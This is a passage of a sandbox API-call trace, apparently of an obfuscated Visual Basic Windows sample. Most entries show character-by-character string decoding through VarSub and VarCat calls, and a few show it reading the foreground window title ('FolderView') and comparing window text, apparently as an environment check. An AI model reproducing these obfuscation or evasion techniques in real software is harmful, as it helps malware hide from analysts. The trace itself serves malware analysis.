pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0176.707] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.708] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.708] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.709] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.709] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.710] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0176.710] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.710] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.711] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.711] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.712] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.713] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0176.713] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.713] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.714] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.714] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.715] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.715] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.716] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.716] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.722] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.722] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.723] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.723] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.723] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.724] GetForegroundWindow () returned 0x1011a [0176.724] GetLastError () returned 0x0 [0176.724] SysStringLen (param_1=" ") returned 0xff [0176.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0176.724] SysStringLen (param_1=" ") returned 0xff [0176.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0176.724] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0176.725] GetLastError () returned 0x0 [0176.725] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0176.725] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0176.725] SysStringLen (param_1="Fold") returned 0x4 [0176.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fold", cchWideChar=5, lpMultiByteStr=0x116863c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fold", lpUsedDefaultChar=0x0) returned 5 [0176.726] SetWindowTextA (hWnd=0x103c4, lpString="Fold") returned 1 [0176.726] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0176.726] GetFocus () returned 0x0 [0176.726] lstrlenA (lpString="Fold") returned 4 [0176.726] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0176.726] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Blan") returned 4 [0176.727] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0176.727] GetFocus () returned 0x0 [0176.727] lstrcmpA (lpString1="Blan", lpString2="Fold") returned -1 [0176.727] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.727] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0176.727] IsWindow (hWnd=0x103c4) returned 1 [0176.728] IsWindow (hWnd=0x103c4) returned 1 [0176.728] IsWindow (hWnd=0x103c4) returned 1 [0176.728] IsWindow (hWnd=0x103c4) returned 1 [0176.728] GetFocus () returned 0x0 [0176.729] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0176.729] GetFocus () returned 0x0 [0176.729] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0176.729] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0176.729] GetFocus () returned 0x0 [0176.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fold", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0176.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fold", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=5 | out: lpWideCharStr="Fold") returned 5 [0176.730] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.730] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.731] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0176.731] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.732] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0176.760] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.760] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0176.761] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.762] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0176.762] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.763] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0176.763] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.764] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0176.764] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.765] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.765] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.766] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0176.766] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.767] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.767] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.768] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.768] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.769] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0176.769] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.769] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.770] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.770] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.771] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.771] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0176.772] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.772] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.773] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.773] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.774] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.774] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0176.775] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.776] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.776] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, 